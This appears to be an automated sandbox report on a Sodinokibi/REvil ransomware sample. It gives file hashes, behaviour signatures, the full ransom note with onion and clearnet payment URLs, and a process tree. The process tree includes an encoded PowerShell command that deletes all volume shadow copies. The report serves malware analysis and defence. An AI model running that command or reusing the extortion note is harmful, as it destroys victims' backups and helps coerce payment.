Overview

overview

10

Static

static

10

ffe7fe4532...95.exe

windows7-x64

10

ffe7fe4532...95.exe

windows10-1703-x64

10

ffe7fe4532...95.exe

windows10-2004-x64

10

ffe7fe4532...95.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    15/06/2024, 11:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

  • Size

    115KB

  • MD5

    63a945da1a63a8e56e8220c4ccf7fd0c

  • SHA1

    a99cf1a2426edeac97c789d0a4b7d38606d7aa45

  • SHA256

    ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195

  • SHA512

    34006d84587ea90e243ebe0dd6bde8bd502ed688001a412898cd4e4c16a5de5788a9fa4c53d3ea79e4307adaa74496e05b205bf9717ac833db976551b1a7c89c

  • SSDEEP

    1536:ikB/Ih3+7QuoZVQgf5GV2jSzGpAyZ4ICS4AwnfxnuLdSbSmoNUExd9M4dgS:gFW7gSzKDin5nWhw4dgS

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\Users\pj328zw1-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension pj328zw1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/881AF8D02A6585AE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/881AF8D02A6585AE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: P58HocFcL5wyWYov4mRqXGXpxKFdz+xYKJuApYSBVc25/ROE6RCnEsJ8ID12nRrS Z9orJyTR6maEDn1eNqxJ7T/Cy5HwJZ7u66nPLwrNgSu/WCYzrZ6uywEGsJKAFR4E 0+kMfG4NDO0leecS75pCX0t7qXpZ5g3Y5zUSYuh50QQuv/QxQuImBfmuIxtAEtCD 30zP+0dv3Q48RVkxkqoBEIUhm9v5RrxzjrU8Pk0A7LQP46fQwQ3kiwtjgzAqJydQ 4kf4X0hdj2+0ga3/P5f15uVz3NSA+ax25BX101OlhkYnJGg3t01o+frOsPyrdj7Z L2ATTEUpzBxRZumXfVkJbscqHABv18hhI6WqHlNdzLs+XauBxEgs0gxHAz1HFyAw rj+cS57bkQ6E20f0Wb0WVYh8Gk3+CiCGNgirPPykcvzwgQdxH+BOFFWG7n4YWkMY gfkDO/V0223K13WAKDVVVm795FKrTAhX3j1jlmYsVOoYTK9j8p925aRhrmMMQYo+ fPEbu64T37jHt6BpGfvurEwCnAs0qtqv5nvjxRTpUSn53S3ATZxu12g5CzfXvq19 +I5g/89aLQ1jS9EdDsmQAZVOoJDOfy2zkcWf37S1WFSBwJy5e7JC2bZN2Wg41GUU fndeL9r/wQPyw3FYO5wbLr5a3eLq8TREleHMK0hS4GGfXzOTGv/Db6WzfKKxzo+u CrPFiiNVQisGjVW5vJSVZ12zrO8dS6kS7nhQYz7YUcnjESA5MRkClY+61xU2Nx9+ PJ63CTCH2S89TCgQdkxngW4p7Bt9slfUcs7BuFG/3k2zBwr0xirn5DDwDx+ogofK fQ5C78UToQgjCe/rjn891N2bA+iWSI1+3RoQnEoaarZwCu+0YkbegVIBu/9zJ3cl EZQQg0rTiv33vddL8dB5PA8DY3QqefZCtNewtiqjGpQDhg8OszZDWZgSxBfG6F9/ EsoxiFtjqskHvWb+jwERlctQQLYrkdObF8kQngBijB0hKLK+w+05V6QVf7dqCiUK sWrtls6O6WD4Q0UvxU/C9kQJuMTyVP0dLHLqIRGh7NyIDUtIarZZMWFrVTTuxHTg XUKGjMzIWNGJhhM7VTHM35lqriAP1LnEU+mO/i9LEXsksgzNaSH2iMjX6rUV18Vy ucTM5+NW5FiaF1CtPPqjO2arnbKB9A56/mGguTI1sxfMVkdKQ8z8bQ9SIYKI/iA1 jRvQ4lJzfFgB39vgdSVQEQ0s5ut8EempcqyTlf0mPasV2PCxru2VeG267MofTcFR haua2TKKZVFb+GaZGXPpOtkAPvGchRFURe95j1KaUXNYrbXAblLeRR0o95X08Hdw 33QEykuhp/xoJlj9ob7mQmT2zSQD/L4NW2d/yj0o77WEWdW3 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/881AF8D02A6585AE

http://decryptor.cc/881AF8D02A6585AE

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 15 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
    "C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2292
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\pj328zw1-readme.txt
      1⤵
        PID:928

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\pj328zw1-readme.txt
        Filesize

        7KB

        MD5

        bda9f40c62f826d48eff2187c1059384

        SHA1

        f00a3f1c1422f04b8148b8942449e563db83674f

        SHA256

        27260b742669db983a30060b75e5aadddfe4ba06b85f293c2320c8367bd6177f

        SHA512

        0f37f52f703e7596cc3863ed33d48a93baa80b2d7cce2a0d898f1074e882815778eaa0e553f8421d4d4214594c7eb40e68e605c4933651cfc42bbd342711bc31

        Download Submit

      • memory/2944-4-0x000007FEF5EFE000-0x000007FEF5EFF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2944-5-0x000000001B280000-0x000000001B562000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2944-6-0x0000000002010000-0x0000000002018000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2944-7-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2944-8-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2944-9-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2944-10-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2944-11-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

        Filesize

        9.6MB

        Download